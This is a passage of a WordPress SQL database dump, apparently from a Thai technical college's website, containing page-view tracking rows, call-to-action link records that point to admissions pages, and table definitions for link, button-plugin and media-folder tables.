(500, '160', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:49:01', '192.168.30.13'),
(501, '287', '634', 0, 0, 'W9Cq750nPWCqZKAuMHsX8gSpn2r4qFhThI4', 0, 'kgbb4cqo0p311c010f31e9v681', 'Direct Traffic', '2018-01-18 16:49:05', '192.168.30.13'),
(502, '160', '622', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:26:38', '192.168.10.71'),
(503, '160', '624', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:26:38', '192.168.10.71'),
(504, '160', '625', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:26:38', '192.168.10.71'),
(505, '160', '626', 1, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:26:38', '192.168.10.71'),
(506, '160', '633', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:26:38', '192.168.10.71'),
(507, '160', '634', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:26:38', '192.168.10.71'),
(508, '160', '622', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:28:16', '192.168.10.71'),
(509, '160', '624', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:28:16', '192.168.10.71'),
(510, '160', '625', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:28:16', '192.168.10.71'),
(511, '160', '626', 1, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:28:16', '192.168.10.71'),
(512, '160', '633', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:28:16', '192.168.10.71'),
(513, '160', '634', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:28:16', '192.168.10.71'),
(514, '160', '622', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:02', '192.168.10.71'),
(515, '160', '624', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:02', '192.168.10.71'),
(516, '160', '625', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:02', '192.168.10.71'),
(517, '160', '626', 1, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:02', '192.168.10.71'),
(518, '160', '633', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:02', '192.168.10.71'),
(519, '160', '634', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:02', '192.168.10.71'),
(520, '160', '622', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:56', '192.168.10.71'),
(521, '160', '624', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:56', '192.168.10.71'),
(522, '160', '625', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:56', '192.168.10.71'),
(523, '160', '626', 1, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:56', '192.168.10.71'),
(524, '160', '633', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:56', '192.168.10.71'),
(525, '160', '634', 0, 0, 'LPAO8Z5tSZVlG4uAzHWumtuRGXWPzCvX1eJ', 0, 'p7bkqbralfh96j45g3ge2b3s64', 'Direct Traffic', '2018-01-18 17:35:56', '192.168.10.71'),
(526, '634', '634', 0, 0, '8tBvScU3xHdsyG0A7C6iK6548IkqcpT1cLx', 0, 'nr9gd75f8o5ncve06kd4uhbkv1', 'Direct Traffic', '2018-01-18 18:14:20', '192.0.99.66');
-- --------------------------------------------------------
--
-- Table structure for table `wp_inbound_tracked_links`
--
CREATE TABLE `wp_inbound_tracked_links` (
`id` mediumint(9) NOT NULL,
`token` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
`args` text COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_inbound_tracked_links`
--
INSERT INTO `wp_inbound_tracked_links` (`id`, `token`, `args`) VALUES
(1, '28oi5d73', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:622;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(2, 'eni2lduw7', 'a:7:{s:6:\"cta_id\";s:3:\"622\";s:2:\"id\";N;s:7:\"page_id\";i:622;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:622) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(3, 'uol2n0i569n', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:624;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(4, 'wnooii4n', 'a:7:{s:6:\"cta_id\";s:3:\"624\";s:2:\"id\";N;s:7:\"page_id\";i:624;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:624) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(5, 'levbdoni14', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:625;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(6, '8nndl0ov', 'a:7:{s:6:\"cta_id\";s:3:\"625\";s:2:\"id\";N;s:7:\"page_id\";i:625;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:625) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(7, '3vnn5o4bnow', 'a:9:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:625;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:21:\"inbound_popup_preview\";s:2:\"on\";s:7:\"post_id\";s:3:\"625\";}'),
(8, '29wo8i0', 'a:9:{s:6:\"cta_id\";s:3:\"625\";s:2:\"id\";N;s:7:\"page_id\";i:625;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:625) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:21:\"inbound_popup_preview\";s:2:\"on\";s:7:\"post_id\";s:3:\"625\";}'),
(9, '6dv0l8e', 'a:10:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:626;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"MTvWwGlO7V\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(10, 'ieou32n9on', 'a:10:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:626;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"MTvWwGlO7V\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(11, 'nvou517iw24', 'a:7:{s:6:\"cta_id\";i:1;s:2:\"id\";N;s:7:\"page_id\";i:626;s:3:\"vid\";i:1;s:3:\"url\";s:230:\"http://www.technicrayong.ac.th/%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%99%E0%B8%B1%E0%B8%81/\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:1) (vid:1)\";s:19:\"wp-cta-variation-id\";s:1:\"1\";}'),
(12, '61odu7oni', 'a:7:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:626;s:3:\"vid\";i:1;s:3:\"url\";s:230:\"http://www.technicrayong.ac.th/%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%9C%E0%B8%A5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%99%E0%B8%B1%E0%B8%81/\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:1)\";s:19:\"wp-cta-variation-id\";s:1:\"1\";}'),
(13, '2l436w1bono', 'a:10:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:626;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"GTegmUZvt0\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(14, 'evwnn85l', 'a:10:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:626;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"GTegmUZvt0\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(15, 'dwvn4oli', 'a:6:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:0)\";}'),
(16, '26o4nli', 'a:7:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:0)\";s:1:\"q\";s:8:\"node/864\";}'),
(17, 'i3dn170e', 'a:6:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:287;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:0)\";}'),
(18, 'oinw8v04n1', 'a:7:{s:6:\"cta_id\";s:3:\"626\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:626) (vid:0)\";s:1:\"q\";s:9:\"node/1788\";}'),
(19, 'd9872nwv4', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(20, '0noodoiu93', 'a:7:{s:6:\"cta_id\";s:3:\"633\";s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:25:\"http://www.inboundnow.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:633) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(21, 'o4lvbo5d', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(22, 'i8e4ouold', 'a:7:{s:6:\"cta_id\";s:3:\"633\";s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:633) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(23, 'ioio92w4n3', 'a:10:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"DrqFWcw1mN\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(24, 'b7dool2n45', 'a:10:{s:6:\"cta_id\";s:3:\"633\";s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:633) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"DrqFWcw1mN\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(25, '7unin1owib6', 'a:9:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:21:\"inbound_popup_preview\";s:2:\"on\";s:7:\"post_id\";s:3:\"633\";}'),
(26, '457il198o0', 'a:9:{s:6:\"cta_id\";s:3:\"633\";s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:633) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:21:\"inbound_popup_preview\";s:2:\"on\";s:7:\"post_id\";s:3:\"633\";}'),
(27, '1o62udo', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:31:\"http://www.landing-page-url.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(28, 'vennodiubo2', 'a:7:{s:6:\"cta_id\";s:3:\"633\";s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:31:\"http://www.landing-page-url.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:633) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(29, '3ueol5v2w', 'a:10:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:31:\"http://www.landing-page-url.com\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"eYclwZipfJ\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(30, 'o8nw60ob3ed', 'a:10:{s:6:\"cta_id\";s:3:\"633\";s:2:\"id\";N;s:7:\"page_id\";i:633;s:3:\"vid\";i:0;s:3:\"url\";s:31:\"http://www.landing-page-url.com\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:633) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";s:10:\"cache_bust\";s:10:\"eYclwZipfJ\";s:15:\"inbound-preview\";s:4:\"true\";s:5:\"wmode\";s:6:\"opaque\";}'),
(31, 'ue6o7nlw', 'a:7:{s:6:\"cta_id\";i:0;s:2:\"id\";N;s:7:\"page_id\";i:634;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:39:\"Call to Action Click (cta_id:0) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(32, 'vn2o8nl64', 'a:7:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:634;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";s:19:\"wp-cta-variation-id\";s:1:\"0\";}'),
(33, 'i7v6en82n', 'a:7:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";s:1:\"q\";s:9:\"node/2034\";}'),
(34, '8v4n1n3', 'a:6:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";}'),
(35, '1i6nd7n', 'a:7:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";s:1:\"q\";s:9:\"node/1788\";}'),
(36, '53u06wnoo2e', 'a:6:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:587;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";}'),
(37, 'l4onon08', 'a:7:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";s:1:\"q\";s:8:\"node/131\";}'),
(38, '3b06oo2n7', 'a:6:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:287;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";}'),
(39, 'o03bwvdnl', 'a:6:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:320;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";}'),
(40, 'i29n6ow', 'a:7:{s:6:\"cta_id\";s:3:\"634\";s:2:\"id\";N;s:7:\"page_id\";i:160;s:3:\"vid\";i:0;s:3:\"url\";s:60:\"http://datacenter.vec.go.th/vec_web/login.htm?mode=admission\";s:11:\"tracking_id\";s:41:\"Call to Action Click (cta_id:634) (vid:0)\";s:1:\"q\";s:9:\"node/1060\";}');
-- --------------------------------------------------------
--
-- Table structure for table `wp_links`
--
CREATE TABLE `wp_links` (
`link_id` bigint(20) UNSIGNED NOT NULL,
`link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
`link_owner` bigint(20) UNSIGNED NOT NULL DEFAULT 1,
`link_rating` int(11) NOT NULL DEFAULT 0,
`link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
`link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `wp_maxbuttonsv3`
--
CREATE TABLE `wp_maxbuttonsv3` (
`id` int(11) NOT NULL,
`name` varchar(100) DEFAULT NULL,
`status` varchar(10) NOT NULL DEFAULT 'publish',
`cache` text DEFAULT NULL,
`basic` text DEFAULT NULL,
`color` text DEFAULT NULL,
`dimension` text DEFAULT NULL,
`border` text DEFAULT NULL,
`gradient` text DEFAULT NULL,
`text` text DEFAULT NULL,
`icon` text DEFAULT NULL,
`container` text DEFAULT NULL,
`advanced` text DEFAULT NULL,
`responsive` text DEFAULT NULL,
`meta` text DEFAULT NULL,
`updated` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`created` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `wp_maxbuttons_collections`
--
CREATE TABLE `wp_maxbuttons_collections` (
`meta_id` int(11) NOT NULL,
`collection_id` int(11) NOT NULL,
`collection_key` varchar(255) DEFAULT NULL,
`collection_value` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `wp_maxbuttons_collections_trans`
--
CREATE TABLE `wp_maxbuttons_collections_trans` (
`name` varchar(1000) DEFAULT NULL,
`value` varchar(255) DEFAULT NULL,
`expire` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
-- --------------------------------------------------------
--
-- Table structure for table `wp_media_folders_lists`
--
CREATE TABLE `wp_media_folders_lists` (
`folder_id` int(11) NOT NULL,
`folder_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
`folder_slug` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
`folder_parent` int(20) DEFAULT NULL,
`type` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
`folder_order` bigint(20) DEFAULT NULL,
`added_date` datetime DEFAULT NULL,
`modified_date` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
--
-- Dumping data for table `wp_media_folders_lists`
--
INSERT INTO `wp_media_folders_lists` (`folder_id`, `folder_name`, `folder_slug`, `folder_parent`, `type`, `folder_order`, `added_date`, `modified_date`) VALUES
(1, 'banner', 'banner', 1, 'folder', 1, '2018-01-06 02:47:18', '2018-10-18 11:16:08'),
(2, 'image', 'image', 3, 'folder', 2, '2018-01-06 02:53:16', '2021-04-19 14:20:34'),
(3, 'PDF', 'pdf', 2, 'folder', 1, '2018-01-06 02:53:29', '2021-04-19 14:20:34'),
(4, 'word', 'word', 0, 'folder', 0, '2018-01-06 02:53:50', '2018-01-06 02:53:50'),
(5, 'excel', 'excel', 25, 'folder', 1, '2018-01-06 02:54:02', '2019-05-01 08:37:59'),
(6, 'events', 'events', 25, 'folder', 1, '2018-01-06 07:24:41', '2019-05-01 08:37:57'),
(7, 'news', 'news', 4, 'folder', 1, '2018-01-06 07:24:50', '2021-04-19 14:20:37'),
(8, 'rtc-sport-2560', 'rtc-sport-2560', 6, 'folder', 1, '2018-01-06 07:25:18', '2018-01-06 07:25:18'),
(9, 'audit-avt-2-2560', 'audit-avt-2-2560', 6, 'folder', 1, '2018-01-06 08:01:00', '2018-01-06 08:01:00'),
(10, 'make-merit-old-year-2560', 'make-merit-old-year-2560', 6, 'folder', 1, '2018-01-06 08:13:11', '2018-01-06 08:13:11'),
(14, 'e-bidding', 'e-bidding', 7, 'folder', 1, '2018-01-10 07:18:06', '2018-01-10 07:18:06'),
(15, 'manager', 'manager', 4, 'folder', 1, '2018-01-18 11:21:58', '2021-05-05 09:27:42'),
(17, 'Student Affairs Development', 'student-affairs-development', 2, 'folder', 1, '2018-01-19 06:59:34', '2018-01-19 07:08:05'),
(18, 'ฝ่ายบริหารทรัพยากร', '-42', 2, 'folder', 1, '2018-01-19 07:10:06', '2019-01-10 02:04:27'),
(19, 'Student Admissions Calendar 2018', 'student-admissions-calendar-2018', 7, 'folder', 1, '2018-01-23 08:27:33', '2018-01-23 08:27:33'),
(20, 'Student Orientation Schedule 2018', 'student-orientation-schedule-2018', 7, 'folder', 1, '2018-01-23 08:43:15', '2018-01-23 08:43:15'),
(21, '9 Informations', '9-informations', 39, 'folder', 2, '2018-01-29 07:53:06', '2019-06-16 10:11:39'),
(23, 'Basic Info of Province', 'basic-info-of-province', 21, 'folder', 2, '2018-02-02 06:28:41', '2018-02-02 06:29:04'),
(24, 'Info of College', 'info-of-college', 21, 'folder', 2, '2018-02-02 06:29:40', '2018-02-02 06:29:40'),
